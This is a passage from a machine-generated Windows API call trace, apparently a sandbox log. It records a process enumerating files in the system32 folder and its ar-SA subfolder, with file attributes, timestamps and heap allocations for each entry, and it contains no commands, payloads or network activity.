ftCreationTime.dwLowDateTime=0xb84b7d50, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84b7d50, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.373] lstrlenW (lpString="api-ms-win-crt-runtime-l1-1-0.dll") returned 33 [0060.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x712f78 [0060.373] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.373] lstrlenW (lpString="api-ms-win-crt-stdio-l1-1-0.dll") returned 31 [0060.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x714ce8 [0060.373] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb85502d0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb85502d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.373] lstrlenW (lpString="api-ms-win-crt-string-l1-1-0.dll") returned 32 [0060.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2) returned 0x713048 [0060.373] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.373] lstrlenW (lpString="api-ms-win-crt-time-l1-1-0.dll") returned 30 [0060.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xbe) returned 0x714db0 [0060.373] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.374] lstrlenW (lpString="api-ms-win-crt-utility-l1-1-0.dll") returned 33 [0060.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x713118 [0060.374] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8504010, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8504010, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-eventing-provider-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.375] lstrlenW (lpString="api-ms-win-eventing-provider-l1-1-0.dll") returned 39 [0060.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd0) returned 0x710d20 [0060.375] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1833b5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1833b5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d1a7690, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-base-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.375] lstrlenW (lpString="api-ms-win-security-base-l1-1-0.dll") returned 35 [0060.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc8) returned 0x7131e8 [0060.375] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4f381b9f, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x4f381b9f, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x4f37fbd0, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-lsalookup-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.375] lstrlenW (lpString="api-ms-win-security-lsalookup-l1-1-0.dll") returned 40 [0060.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd2) returned 0x714e78 [0060.375] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4f3a7cfe, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x4f3a7cfe, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x4f3a6cd0, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-sddl-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.375] lstrlenW (lpString="api-ms-win-security-sddl-l1-1-0.dll") returned 35 [0060.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc8) returned 0x7132b8 [0060.375] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-core-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.375] lstrlenW (lpString="api-ms-win-service-core-l1-1-0.dll") returned 34 [0060.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc6) returned 0x713388 [0060.376] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1370f7, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1370f7, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-management-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.376] lstrlenW (lpString="api-ms-win-service-management-l1-1-0.dll") returned 40 [0060.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd2) returned 0x714f58 [0060.376] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d09eb7b, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d09eb7b, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-management-l2-1-0.dll", cAlternateFileName="")) returned 1 [0060.376] lstrlenW (lpString="api-ms-win-service-management-l2-1-0.dll") returned 40 [0060.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd2) returned 0x715038 [0060.376] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d267bef, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d267bef, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-winsvc-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.376] lstrlenW (lpString="api-ms-win-service-winsvc-l1-1-0.dll") returned 36 [0060.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xca) returned 0x710df8 [0060.376] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7821a163, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x7821a163, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apilogen.dll", cAlternateFileName="")) returned 1 [0060.376] lstrlenW (lpString="apilogen.dll") returned 12 [0060.377] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x715118 [0060.377] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f2f92c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc1f2f92c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x36000, dwReserved0=0x0, dwReserved1=0x0, cFileName="apircl.dll", cAlternateFileName="")) returned 1 [0060.377] lstrlenW (lpString="apircl.dll") returned 10 [0060.377] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x7151c0 [0060.377] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de74afe, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2de74afe, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf261dbf0, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apisetschema.dll", cAlternateFileName="")) returned 1 [0060.377] lstrlenW (lpString="apisetschema.dll") returned 16 [0060.377] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa2) returned 0x715260 [0060.377] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92c3856c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92c3856c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92c5e6cc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x48400, dwReserved0=0x0, dwReserved1=0x0, cFileName="apphelp.dll", cAlternateFileName="")) returned 1 [0060.377] lstrlenW (lpString="apphelp.dll") returned 11 [0060.377] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x715310 [0060.377] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4c40da, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x7a4c40da, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apphlpdm.dll", cAlternateFileName="")) returned 1 [0060.377] lstrlenW (lpString="Apphlpdm.dll") returned 12 [0060.377] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7153b0 [0060.378] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6b7842, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xcc6b7842, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7e608600, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="appidapi.dll", cAlternateFileName="")) returned 1 [0060.378] lstrlenW (lpString="appidapi.dll") returned 12 [0060.378] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x715458 [0060.378] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd29cc968, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd29cc968, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7e6540f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x31a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppIdPolicyEngineApi.dll", cAlternateFileName="")) returned 1 [0060.378] lstrlenW (lpString="AppIdPolicyEngineApi.dll") returned 24 [0060.378] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xb2) returned 0x715500 [0060.378] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98006f9, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x98006f9, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7e6c6ce0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24800, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgmts.dll", cAlternateFileName="")) returned 1 [0060.378] lstrlenW (lpString="appmgmts.dll") returned 12 [0060.378] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7155c0 [0060.378] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c14fdd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1c14fdd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1c6129e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x53000, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgr.dll", cAlternateFileName="")) returned 1 [0060.378] lstrlenW (lpString="appmgr.dll") returned 10 [0060.378] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x715668 [0060.378] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f6f58ca, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8f6f58ca, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8f6f58ca, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="appwiz.cpl", cAlternateFileName="")) returned 1 [0060.378] lstrlenW (lpString="appwiz.cpl") returned 10 [0060.379] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc81f8794, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc81f8794, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e6eb6d0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x30e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apss.dll", cAlternateFileName="")) returned 1 [0060.379] lstrlenW (lpString="apss.dll") returned 8 [0060.379] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x92) returned 0x715720 [0060.379] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0060.379] lstrlenW (lpString="ar-SA") returned 5 [0060.379] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x717708 [0060.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\ar-SA\\*", lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.382] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.382] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2e2f2c, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcd70d590, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcd70d590, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="cdosys.dll.mui", cAlternateFileName="")) returned 1 [0060.382] lstrlenW (lpString="cdosys.dll.mui") returned 14 [0060.383] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd8641e7, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcdbaa011, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcdbaa011, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0060.383] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0060.383] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc973a95d, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xca5a8e5c, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xca5a8e5c, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0060.383] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0060.383] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24606e1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc29bb83d, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc29e199c, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0060.383] lstrlenW (lpString="fms.dll.mui") returned 11 [0060.383] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6374c39, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc672ce80, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc672ce80, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0060.383] lstrlenW (lpString="mlang.dll.mui") returned 13 [0060.383] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc578de89, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc5ce8fe5, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc5ce8fe5, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0060.383] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0060.383] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c657b4, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc4f5f320, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc4f5f320, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msprivs.dll.mui", cAlternateFileName="")) returned 1 [0060.383] lstrlenW (lpString="msprivs.dll.mui") returned 15 [0060.383] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x717708 | out: lpFindFileData=0x717708*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c657b4, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc4f5f320, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc4f5f320, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msprivs.dll.mui", cAlternateFileName="")) returned 0 [0060.384] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.385] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x717708 | out: hHeap=0x6e0000) returned 1 [0060.385] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bf02cff, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5bf02cff, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x656df510, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARP.EXE", cAlternateFileName="")) returned 1 [0060.385] lstrlenW (lpString="ARP.EXE") returned 7 [0060.385] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x90) returned 0x717708 [0060.385] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31c9efbc, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x31c9efbc, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xf2a6d430, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="asferror.dll", cAlternateFileName="")) returned 1 [0060.385] lstrlenW (lpString="asferror.dll") returned 12 [0060.385] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x7177a0 [0060.385] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x57090500, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_counters.dll", cAlternateFileName="ASPNET~1.DLL")) returned 1 [0060.385] lstrlenW (lpString="aspnet_counters.dll") returned 19 [0060.385] RtlAllocateHeap 